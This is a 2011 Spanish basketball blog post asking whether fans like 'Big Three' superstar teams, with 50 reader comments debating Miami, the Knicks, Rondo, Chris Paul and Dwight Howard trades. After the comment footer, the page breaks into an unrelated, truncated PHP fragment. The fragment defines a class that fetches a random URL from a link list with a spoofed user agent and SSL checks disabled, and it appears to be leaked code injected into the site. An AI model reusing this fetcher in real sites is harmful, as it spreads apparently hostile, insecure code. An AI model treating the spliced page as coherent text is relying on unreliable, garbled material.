La pregunta

02 de December de 2011 por txusma

¿Os gustan los ‘Big Three’ al estilo Miami o al que se vislumbra en los Knicks?

Comenta

50 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    A mI no me gustan demasiado, me parece un poco aberrante y “tramposo”. Es cierto que hay equipazos como Lakers o Cetlics pero son fruto de traspasos (Pau, KG) y también de buenIsimas elecciones en el Draft (Rondo, Bynum) asI que me parece mas licito y real.
    Ademas creo que Chris Paul comete un error porque creo que lo mejor para él serIa juntarse con Howard. Creo que el/los All-star que se junten con el pivot ganaran el anillo este año. Yo si fuese Dwight me iria con Rose a Chicago y entre los 2 tendrian equipazo para largo con opciones desde ya.

    Stat-Melo-Paul? No lo veo

      Citar

  2. nach dice:
    #2

    No hay que olvidar que Deron acaba contrato este año, lo digo por lo de Howard.

    Por otra parte, para mí hacer estos tríos es contraproducente para los propios equipos, ya que te juegas todo a la carta de que no haya lesiones en ninguno de ellos porque perderlos sería una catástrofe…

    Y no es lo mismo un Wade-LeBron-Bosh, que claramente hace aguas por dentro que un Pierce-Allen-Garnett, mucho más compensado, igual que no es lo mismo el banquillo de unos que el de otros, o lo que sería del Paul-Melo-Stat, que volvería a hacer aguas por dentro, aunque con la cláusula de amnistía igual un equipo dispuesto a derrochar al estilo Knicks podría pescar algo por 4 duros, ya que los jugadores con los que usen esa cláusula van a cobrar lo mismo estén donde estén, con lo cual es de suponer que busquen equipos potentes.

      Citar

  3. dsromero dice:
    #3

    A mi personalmente Lebron me cae demasiado mal como para gustarme un “equipo” donde juegue el (por muy bueno que sea) pero entre el aprecio que siento por los NYK y que Amare es una debilidad personal… pues ahí ya cambiaría la cosa.

    Vamos que me es indiferente que se monten “Big Threes”, tengo mis filias y mis fobias y en función de quienes estén me gustarán más o menos. Pero desde el punto de vista simplemente deportivo creo que Miami ha demostrado que solamente 3 jugadores no hacen un equipo ganador, por muy buenos que sean.

    Un trío de esos en cambio formado por un 5 (Howard) un 3-4 tirador (Dirk) y un base en condiciones (Paul) sería otra cosa, pero juntar un 2 un 3 y un 4, todos anotadores y un poco chupones…… mal asunto

      Citar

  4. AndiD dice:
    #4

    Hombre, dsromero, lo de “Miami ha demostrado que solamente 3 jugadores no hacen un equipo ganador” no lo veo yo muy claro. No me gustó la forma en la que se formó el BigThree de Miami, pero no creo que su temporada haya sido mala. Para ser el primer año que están juntos y con un par de lesiones en el equipo durante la RS, acabar con 58 vicotrias y llegar a la final dejando por el camino al MVP Rose…

    Al supuesto BigThree de NY creo que le harán falta 4 balones para jugar, aunque lo mismo se decía del de Miami y al final parece que se entendieron más o menos. La pregunta es: Quién hará de Bosh en NY y se quedará muchos partidos en 6/7 tiros??

    Ah, NO, no me gustan ese estilo de equipos. Prefiero equipos que se desarrollan poco a poco, que van creciendo, aunque sea a base de fichar, pero no todos de golpe 🙂

      Citar

  5. Diestro dice:
    #5

    A mi si me gustan este tipo de equipos, me parece que es una gozada ver jugar de una tacada a los mejores, y no en plan All-Star, sino poniendo toda su sangre en hacerlo bien y cediendo en apartados para enfocarse en el colectivo.

    Ahora bien, el problema que conlleva es que existen otros equipos que se quedarían sin atractivo ninguno para mi, así que para mi sobran equipos. Entiendo que en tal ciudad quieran tener un equipo de allí, pero a mi que lo veo desde mi sofá a miles de kilómetros me atraen los equipos por su juego y no por su localización en un mapa. Lógicamente esto no va a pasar pero como esto es un “que me gusta”, a mi me sobran equipos.

    Por lo cual también me sobran jugadores, que no disfruto viéndolos en la NBA y que seguramente en una liga europea seria muy atractivos de ver.

    Que radical me ha quedado!!!! jajajaja, es una opinión más, y siento si algún seguidor de algún equipo en concreto se ha sentido ofendido con mi comentario.

    SAludos

      Citar

  6. Viva_Dirk dice:
    #6

    Yo creo que Paul-Melo-Stat es un grupo de estrellas bastante compensado y que no se pisan terreno unos a otros. Ese equipo con Fields de escolta necesita un center defensivo, Dalembert esta en el mercado y es el perfil ideal. En cuanto a banquillo, tienen la opción del expiring de Billups para atraer un par de jugadores de rotación.

      Citar

  7. nach dice:
    #7

    Viva_Dirk:
    Yo creo que Paul-Melo-Stat es un grupo de estrellas bastante compensado y que no se pisan terreno unos a otros. Ese equipo con Fields de escolta necesita un center defensivo, Dalembert esta en el mercado y es el perfil ideal. En cuanto a banquillo, tienen la opción del expiring de Billups para atraer un par de jugadores de rotación.

    El tema es a qué van a jugar, si van a jugar run&gun, con Stat de 5 y Melo de 4, necesitarían otro 3, y de esos libres igual queda alguno interesante con el tema de la amnistía o que sea agente libre (Carter?), aunque necesitarían a alguien “completo”, por así decirlo, capaz de hacer diferentes cosas, al estilo de Diaw en Phoenix.
    Si quieren jugar más control pues si, necesitarían a un 5 defensivo y conseguir algo de rotación, lo de Dalembert es una opción, Chandler otra para ese puesto de 5, luego el expiring de billups se iría en parte a uno de estos y necesitarían conseguir algo más, pero todo dependerá de si los equipos deciden usar la amnistía o no, porque se me vienen unos cuantos nombres: Calderón, Bargnani, Barbosa, Joe Johnson, Arenas, Lewis…

      Citar

  8. AndiD dice:
    #8

    Wow, wow, no tan rápido vaqueros 🙂
    Viva, nach, dais por hecho que Paul ya está en NY… y todavía hay que ficharlo!! Si después de traerse a Paul, Fields y Billups todavía siguen en NY… menudo chollazo!!! Creo que media NBA se estaría quejando en estos momentos, porque no sería un trade muy justo dejar salir a Paul a cambio de nada.

      Citar

  9. nach dice:
    #9

    AndiD: ería un trade muy justo dejar salir a Paul a c

    AndiD:
    Wow, wow, no tan rápido vaqueros
    Viva, nach, dais por hecho que Paul ya está en NY… y todavía hay que ficharlo!!Si después de traerse a Paul, Fields y Billups todavía siguen en NY… menudo chollazo!!! Creo que media NBA se estaría quejando en estos momentos, porque no sería un trade muy justo dejar salir a Paul a cambio de nada.

    Nono, no doy por hecho eso, pero es una opción viable, está claro que van a tener que rascarse le bolsillo porque NO no tiene dueño y no van a aceptar un timo xD.

    También Paul tiene la opción de esperar este año, acabar contrato, ser agente libre y después está la opción más que interesante para el de Celtics, con KG y Allen acabando contrato esta temporada, y es de esperar que de renovar lo hagan muy a la baja, y Rondo sería una monedaza de cambio para conseguir jugadores, media NBA se mataría por el. Para mí el que más tiene que perder aquí es Rondo, estoy hablando a 1 año vista.

      Citar

  10. nach dice:
    #10

    Pero en ese caso, estaría Deron libre también, con lo cual las opciones de Paul de ir a Celtics se reducirían…

    PD: Estoy intentando registrarme para comentar pero no me manda el mail a mi correo…

      Citar

  11. Vader dice:
    #11

    A mi los big three ni me gustan ni me disgustan. Lo veo una forma tan lícita como otra de montar un equipo porque primero las normas lo permiten y segundo no todo son ventajas y no se consigue una supremacia tan clara como algunos analistas pensaban. La demostración la tuvimos la temporada pasada con Miami.

    Eso si, creo que a largo plazo tanto Miami, como NY (si fichan a CP3, que esta por ver) seran muy competitivos porque a parte de las 3 estrellas cada año puedes ir añadiendo complementos via draft, mid-levels y traspasos. Y por tanto lo que el año 1 del proyecto es una plantilla muy justa igual dentro de 2 años es un equipazo como el que hizo Boston al montar el Big Three original.

    Y ya entrando más a comparar entre el big three de miami y el posible de NY. Ya lo dije alguna vez, me parece mucho más compensado el CP3-Melo-Stat que el Wade-Lebron-Bosh. Wade y Lebron son jugadores bastante parecidos, anotadores muy físicos y penetradores sin un tiro fiable de larga distancia y Bosh aunque es un gran 4 su juego dentro de la zona no es su fuerte. En cambio en el otro lado tienes a un director de orquesta capaz de antoar, CP3, Un anotador con buen tiro, Melo, y un 4 que dentro de la zona hace pupita… seguramente el jugador interior mejor de la NBA a nivel ofensivo. Ahí lo dejo 😀

    Saludos

      Citar

  12. nach dice:
    #12

    Es que esa es otra, lo de Miami a mi desde le principio me pareció muy descompensado, que si, que tienes un perímetro tremendo, pero por dentro te destrozan.

    El de Boston era mucho más equilibrado que cualquiera de los que suenan, con uno de los mejores defensores de la liga, uno de los mejores tiradores y un grandísimo anotador, todo eso completado por uno de los mejores bases defensivamente hablando de la liga y que no es un chupón.

      Citar

  13. Txusma dice:
    #13

    Del Big Three de Boston una pregunta: ¿Cuanto le deben a Rondo? Es decir, se juntaron 3 cracks pero la gran suerte fue encontrar a Rajon Rondo. Si en lugar de Rondo hubieran tenido de base un Mario Chalmers cualquiera, hubiera habido anillo y final?

      Citar

  14. Nacho dice:
    #14

    Txusma: ¿Cuanto le deben a Rondo?

    Mucho, muchismo. Tendrá sus altibajos, tendrá días de tiro infames, pero es una gozada de jugador. Para mí, el base más infravalorado de la NBA, a la altura de cualquiera de los otros, pero como no es tan EGOÍSTA, pues parece que no es nada.
    Sobre lo del Big Three, ¿en serio situáis a Stat en él? Pensé que hablábais de Howard.
    Y a la pregunta: No, no me gustan.

      Citar

  15. Cocinitas dice:
    #15

    Lo de juntar un 2, un 3 y un 4 me suena de que funcionó bastante bien en los bulls del 96 al 98, con 3 hall of fame en sus filas, si bien es verdad que Rodman era una maquina en defensa.
    Aún así yo siempre he creido más en la pareja Base-Pivot y 3 especialistas, creo que los Nets con Deron y Howard + 3 buenos jugadores de complemento como López, un escolta anotador (Hamilton) y un buen alero (Butler, Prince) tendria mucho mejor equipo que Miami y por el mismo dinero.

      Citar

  16. HisRoyalAirness dice:
    #16

    Pues yo no estoy de acuerdo en bastantes cosas, por ejemplo Txus, la pregunta es cuánto le debe el Big tHree a Rondo? O cuánto le debe Rondo al Big Three? Porque es muy probable que en otro equipo no fuese titular con esos porcentajes de tiro, no hubiese podido progresar y, sobre todo, promediaría 10 asistencias en los Bobcats junto a Kwame Brown?

    Y venga, Stoudamire el mejor interior ofensivo? Es una broma? Lo de “interior” ya es para dudarlo porque para el tamaño que tiene le escapa màs a la zona que Bargnani. Si tienes a Amare de center y te cruzas con Howard o Pau (ya lo hizo) te van a pulverizar a todos los niveles

    Y sí, Miami está descompensado y es débil por dentro pero eso les supuso algÙn problema real? Controlaron a Boozer y Noah perfectamente y no perdieron las finales por eso, Chandler hizo un gran papel pero precisamente los que le hicieron un roto y descompensaron partidos fueron Terry (perímetro), Barea (perímetro) y Dirk (inclasificable deidad). No es que Chandler se hiciese unas finales tipo Shaquille y creo que hay que romper una lanza en favor de tipos como Haslem porque dentro de sus limitaciones lo hicieron cojonudamente en PO.

      Citar

  17. Blade Petrovic dice:
    #17

    A mí no me gusta ninguno pero si tengo q elegir elijo al de los heat

      Citar

  18. HisRoyalAirness dice:
    #18

    Y por cierto Viva, digo que Melo-CP3-Stat me parece descompensado porque Paul necesita la bola para organizar jugada, sobarla y decidir, no llegar al medio campo y soltársela a Melo para que se tire mandarinas, ya no hablo sólo de tiros sino de retención del balón, el impacto real de CP sobre el juego es cuando el equipo se mueve a su alrededor, como Rose, no es el mismo perfil que Rondo al menos a mí no me lo parece. Rondo es inconsistente y no suele preocupar porque la anotación no es un requisito para él y por eso sus partidos improductivos a ese nivel no suponen lastre real.

    Es cierto que a veces también me olvido de que Deron es FA el aÑo que viene.
    Voy a dejar escrita una fantasmada pero que realmente pienso: el base que se junte con Howard, sea Rose, Paul o Williams va a ser el que va a ganar anillos de verdad y con relativa rapidez (de las otra combinaciones tipo Howard a Lakers no opino porque ya es evidente)

      Citar

  19. Txusma dice:
    #19

    Pero ojo con Rondo. Lo normal es que un base sea bueno en el tiro para de este manera atraer la atención de los defensas y poder asistir con más facilidad. Que Rondo asista lo que asiste con semejante laguna en su juego es digno de estudio.
    Y bueno, si sigo con la comparativa Rondo-Chalmers, este último ha jugado con 3 de los más grandes y tampoco se ha inflado a repartir asistencias. Vamos, que lo de los Celtics el primer año a lo mejor no pero a partir del 2 era más Big Four que Big Three y no te diría ya que la importancia de Rondo está por encima, por ejemplo, q la de Allen.

      Citar

  20. nach dice:
    #20

    Txusma:
    Pero ojo con Rondo. Lo normal es que un base sea bueno en el tiro para de este manera atraer la atención de los defensas y poder asistir con más facilidad. Que Rondo asista lo que asiste con semejante laguna en su juego es digno de estudio.
    Y bueno, si sigo con la comparativa Rondo-Chalmers, este último ha jugado con 3 de los más grandes y tampoco se ha inflado a repartir asistencias. Vamos, que lo de los Celtics el primer año a lo mejor no pero a partir del 2 era más Big Four que Big Three y no te diría ya que la importancia de Rondo está por encima, por ejemplo, q la de Allen.

    Lo de Rondo y las asistencias es cierto que patina muchísimo en cuanto a tiro, pero es un grandísimo penetrador, lo que hace que cuando arranque para dentro, acumula hombres a su alrededor y atención que usan sus compañeros (que no son mancos precisamente) para tener espacios, si tuviera tiro, con sus condiciones físicas, defensa y visión de juego, sería MVP xD

    Yo también soy más de la opinión de que mejor una dupla exterior-interior potente es mejor que 3 buenos, porque el resto va a ser relleno, especialistas defensivos o triplistas, mientras que con 2 cracks puedes tener espacio para acompañarlos de jugadores que sean capaces de hacer algo más.

      Citar

  21. HisRoyalAirness dice:
    #21

    Txusma:
    Pero ojo con Rondo. Lo normal es que un base sea bueno en el tiro para de este manera atraer la atención de los defensas y poder asistir con más facilidad. Que Rondo asista lo que asiste con semejante laguna en su juego es digno de estudio.
    Y bueno, si sigo con la comparativa Rondo-Chalmers, este último ha jugado con 3 de los más grandes y tampoco se ha inflado a repartir asistencias. Vamos, que lo de los Celtics el primer año a lo mejor no pero a partir del 2 era más Big Four que Big Three y no te diría ya que la importancia de Rondo está por encima, por ejemplo, q la de Allen.

    Ojo que estoy de acuerdo eh? Que Rondo me parece un distribuidor fuera de serie pero creo que ellos le han dado tanto a él como èl a ellos

      Citar

  22. Denise dice:
    #22

    Me gustan los equipos que no dependen tanto de su par o triplete de estrellas, y que cuando éstos estan lesionados o no tienen el día, tienen gente con recursos para echarse el equipo a las espaldas.
    No hay que olvidar que el baloncesto es un deporte colectivo y de equipo

      Citar

  23. melo15 dice:
    #23

    A mi rondo me encanta i si tuviera tiro seria el mejor base de la liga
    I tambien estoi de acuerdo con denise porque mira lo que pasa con los heat tienen un banquillo asqueroso pero los knicks solo tienen dos jugadores buenos. Yo cortaria a billups i ficharias a un center defensivo para que se complemente con stat i. Despues no me parece que balkam se tan malo i douglas es bueno i abeis oido hablar de ima shumpert o algo asi yo e leido que es un jugador mui bueno defensivamente

      Citar

  24. Txusma dice:
    #24

    Melo, cuando dices cortar a Billups te refieres aplicar la amnistia? Piensa que el contrato de Billups es la única posibilidad que tienen los Knicks para hacerse con Chris Paul.

      Citar

  25. melo15 dice:
    #25

    Si no se eso de bajar el salario de paul nada un center defensivo. I algin jugador de perimetro que te parece

      Citar

  26. Q dice:
    #26

    El mejor Big Three de los que suenan para mi de largo es Kobe-Pau-Howard.

      Citar

  27. melo15 dice:
    #27

    Pau esta acabao

      Citar

  28. Sancho88 dice:
    #28

    A mí sí me parece positivo el big three que se quiere montar la gran manzana. Carmelo y Stat rinden mejor con un base rápido y que les dé tiros fáciles. Melo lo hacía con el billups de Denver, no con el billups de ahora que está para pocos trotes, y Amare con Nash en Phoenix. Ponerles a un tío como Chris Paul, que en mi opinión es el mejor base de la competición, incluso por encima de Rose, sería muy positivo. Para la denostada Conferencia Este le daría el quinto equipo de calidad si contamos a Miami, Chicago, Boston y Orlando, lo que daría algo de nivel por ese cuadro. Por cierto, aparte de Paul a Nueva York, el otro movimiento que parece claro es Howard a Los Ángeles. La pregunta es, los amarillos están cansados definitivamente de la rodilla de Andrew, prefieren deshacerse del contrato de Pau, limpiar el cementerio de elefantes con Odom, Artest, Fisher…. se van a quedar como están y sin Howard… Para mí es interesantísimo saber cómo van a afrontar esta temporada. Vosotros qué pensáis?

      Citar

  29. Q dice:
    #29

    Muy pronto matas a Gasol. El año pasado hizo los mismos números que todos los años y bajó en playoffs, donde tampoco estuvo mal del todo.

    Un Bynum+Artest a cambio de Howard+Ryan Anderson. Cláusula de Amnistía en Walton y tratar de pescar a Grant Hill o Battier en le Free.

    Para mi candidatos número uno al anillo y no son nada descabelladas las cábalas que pongo.

      Citar

  30. Sancho88 dice:
    #30

    Q:
    Muy pronto matas a Gasol. El año pasado hizo los mismos números que todos los años y bajó en playoffs, donde tampoco estuvo mal del todo.

    Un Bynum+Artest a cambio de Howard+Ryan Anderson. Cláusula de Amnistía en Walton y tratar de pescar a Grant Hill o Battier en le Free.

    Para mi candidatos número uno al anillo y no son nada descabelladas las cábalas que pongo.

    Hombre, yo lo decía porque han salido rumores de lo de Pau. Pero sería una traición de las grandes si le traspasan. Si L.A. monta un equipo con Kobe, Pau y Howard, está claro para donde se va el anillo. Con lo del alero, a Hill se lo podrían pillar por casi nada de pasta y realmente les daría anotación, juego en equipo, defensa… ya sabemos de qué es capaz el bueno de Grant, de casi todo, y luego a ver si piyan un base porque fisher-blake… ahí palman muchos partidos Lakers. Los bases rápidos les matan.

      Citar

  31. melo15 dice:
    #31

    Tio pau cuando llego el momento de la verdad (playoffs) fracaso fidher esta acabadisimo igual que artest blake
    Walton.bynum a mi me parece mui bueno pero es mejor howard este big three es el peor pau no puede contra stat ni bosh i wade aora es igual o mejor que kobe por no hablar de james que si tiene su noche las cagao los lakers an de aceptar que ya no son candidatos al anillo yo si fuera howard me voi ya a new orleans o a new jersey

      Citar

  32. Sempren dice:
    #32

    Sancho, yo creo que Q le respondía a Melo, tanto por su nivel de argumentación, como por la hora a la que mandó el mensaje (lo escribió casi al mismo tiempo que tú).

    A mí no me gustan los Big Three como el de Miami, tanto por “mal confeccionado”, como por la forma de ponerse de acuerdo entre los tres, sin olvidarnos de LeBron, al que también le tengo cierta inquina, para qué negarlo.
    Un poco por todos estos motivos veo ese Big Three muy diferentes a los de Boston, los posible de NY o Lakers, etc.

      Citar

  33. Sancho88 dice:
    #33

    Tienes razón, es q con tanto comentario uno pierde un poco el hilo de a quién va y a quién no va. Pues sí, muy osado lo que dice Melo, y más teniendo en cuenta la meada de Pau en el Eurobasket. Si eso es estar acabado… Howard a New Orleans o Nets? se tendría que piyar una fumada bestial, de las que hacen época, para firmar un contrato con esos equipos. En fin…

      Citar

  34. melo15 dice:
    #34

    Vale alomejor me e pasao con lo de pau pero los años pesan. I lo de howard porque es tan raro
    I una cosa mas cuantos años le quedan a iguodala de contarto

      Citar

  35. nach dice:
    #35

    melo15:
    Tio pau cuando llego el momento de la verdad (playoffs) fracaso fidher esta acabadisimo igual que artest blake
    Walton.bynum a mi me parece mui bueno pero es mejor howard este big three es el peor pau no puede contra stat ni bosh i wade aora es igual o mejor que kobe por no hablar de james que si tiene su noche las cagao los lakers an de aceptar que ya no son candidatos al anillo yo si fuera howard me voi ya a new orleans o a new jersey

    Bueno, un quinteto con Gasol+Howard por dentro habría que mirar si no se estorban ni se comen espacio, pero Pau puede jugar más abierto, y serían instantáneamente el mejor juego interior de la NBA, lo cual te garantiza mínimo PO y luego con Kobe por fuera más un especialista defensivo como Artest o Battier tela, faltaría el base, pero hay que ver los que quedan libres y como funciona el tema de la amnistía para los traspasos, que eso no está claro…

    Si hacen ese movimiento, para mí nº1 al anillo por encima de Miami o Celtics o NY en caso de que fichen a Paul, cosa nada clara por cierto. Yo si fuera ellos iría a por Deron que me parece mejor pero..

    Dices que Pau no puede con Stat, entiendo que defensivamente. Ahora bien, tu crees que un equipo Paul-Melo-Stat podría contra uno con Kobe-Pau-Howard? teniendo en cuenta que el 3 de Lakers supongo que sería un especialista defensivo para anular al 3 rival (algo totalmetne pensado hacia Melo,LeBron o Pierce)

      Citar

  36. melo15 dice:
    #36

    Es como si me dices que balkam puede con kobe pero tu crees que howard. Se va a los lakers. Yo repito me iria a new orleans por okafor i asi tambien atan a west despues tendrian que reforzarse con alguien

      Citar

  37. nach dice:
    #37

    melo15:
    Es como si me dices que balkam puede con kobe pero tu crees que howard. Se va a los lakers. Yo repito me iria a new orleans por okafor i asi tambien atan a west despues tendrian que reforzarse con alguien

    a un jugador le pones ir a lakers o a otro equipo (quitando celtics) y le falta tiempo para firmar XD.
    No estoy diciendo que pueda con ellos, digo que si haces un emparejamiento hombre a hombre, en un quinteto pongamos para Lakers Fisher-Kobe-Artest/Battier-Pau-Howard o un Paul-X-Melo-Stat-X, y ojo, pongo las X porque para traer a Paul, los Knicks deberían bailar mucho no, muchísimo

      Citar

  38. melo15 dice:
    #38

    Pero no creo que howars se vaya a los lakers para mo que se ira a new orleans new jersey o se quedara con los $agic pero entonces vendra paul o deron

      Citar

  39. Txusma dice:
    #39

    Sancho88:
    Tienes razón, es q con tanto comentario uno pierde un poco el hilo de a quién va y a quién no va.

    Nada como citar para ver rápidamente para quien van las respuestas 😉

      Citar

  40. Uno cualquiera dice:
    #40

    Si Howard se va a los Hornets te doy 50 €

      Citar

  41. melo15 dice:
    #41

    oye que era solo una prediccion el año pasao nadie pensaba que miami se quedaria con los tres premios gordos( james wade i bosh) i asi fue

      Citar

  42. CAMPO2 dice:
    #42

    Lo de Howard por Okafor ni en el 2K12 forzando traspasos, yo creo que Paul ira a NYK y Howard si montan buen equipo en Nets se ira camino de Brooklyn con Deron si lo convencen.

    Por favor utilizar un corrector ortográfico, que algunos post cuesta leerlos.

      Citar

  43. melo15 dice:
    #43

    Ya pero mejor okafor que nada a final de temporada i otra cosa paul a los knicks lo dudo yo escharia ya a stat que no se complementa bien con melo i a turiaf i ficharia a tres o cuatro jugadores dos alapivots un center i despues vendes a billups por algun base yo apuesto por flynn creo que se complemente muy bien con douglas que opinais

      Citar

  44. Ru dice:
    #44

    melo15,por favor,amén de hacer mucho más fácil la lectura de tus comentarios usa comas y puntos,que hay veces que es muy complicado coger el sentido de lo que dices y todas las opniones merecen ser leídas.

    Qué os parece que Chandler pida 20 millones…por muy buena temporada que haya hecho se ha subido a la parra.

      Citar

  45. melo15 dice:
    #45

    Okok

      Citar

  46. Lentejita dice:
    #46

    Os imaginais un trade James por Howard (con contrato renovado)??
    Es que para mi gusto los mejores big threes son con dos interiores, estilo torres gemelas de LAL, o almenos tener a dos tios grandes buenos, y boozer-noah no cuentan.

      Citar

  47. Sancho88 dice:
    #47

    melo15:
    oye que era solo una prediccion el año pasao nadie pensaba que miami se quedaria con los tres premios gordos( james wade i bosh) i asi fue

    Macho, como te complicas la vida, Howard a Hornets, Flynn a Nueva York porque le viene mejor que Paul… qué liga te ves tu? Y bueno, lo de Miami dices q no lo esperaba nadie. Te equivocas. En Pekín 2008 ya se hablaba del verano del 2010 y del draft de 2004 con todos los grandes quedando como agentes libres: Melo, Wade, Bron, Bosh, Amare, etc. Lo hablaron Bron y Wade, de jugar juntos, y Bosh ya había anunciado en enero de 2010 en la prensa de Toronto que se piraba. Estaban armando el equipo claramente, e incluso Wade se bajó el sueldo para liberar más salario para Bosh y Bron. Ninguno de ellos fue al mundial y se quedaron preparando todo aquello. Entonces, una mañana Bosh anuncia que se va a Miami, y esa misma noche es ‘La decisión’ de James en TNT. Si no ves indicios claros del big three de Miami… explícame un indicio de Howard a Nueva Orleans o Flynn a Nueva York. Es como decir que Pau se va a los Bobcats o Garnett vuelve a Minnesotta… no tiene sentido

      Citar

  48. melo15 dice:
    #48

    No, a mi flynn me gusta mucho porque jugaba en syracuse (i yo soi de syracuse) i me gustaria que jugara en los knicks.I otra cosa es que howard se vaya a los hornets que se arian un equipazo i ademas atan a west i a paul i seguro que si howard se va a los hornets abra unos cuantos que querran irse a losd hornets porque es anillos casi asegurao

      Citar

  49. busky23 dice:
    #49

    Sobre el tema del traspaso de C.Paul a los Knicks si partimos de la base que la NBA es propietaria de los Hornets y que la liga no es para nada partidaria de los BigThrees dudo mucho que facilite el traspaso.
    A partir de esta tarde ya empezara el movimiento serio en el mercado,el baile de pivots va a ser interesante con Nene,Howard,Chandler,Marc,Oden…

      Citar

  50. HisRoyalAirness dice:
    #50

    Melo15 lo de decir que Pau no puede defensivamente con Stoudamire es una broma no? porque el descosido que le hizo en las finales de conferencia del año pasado fue escandaloso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>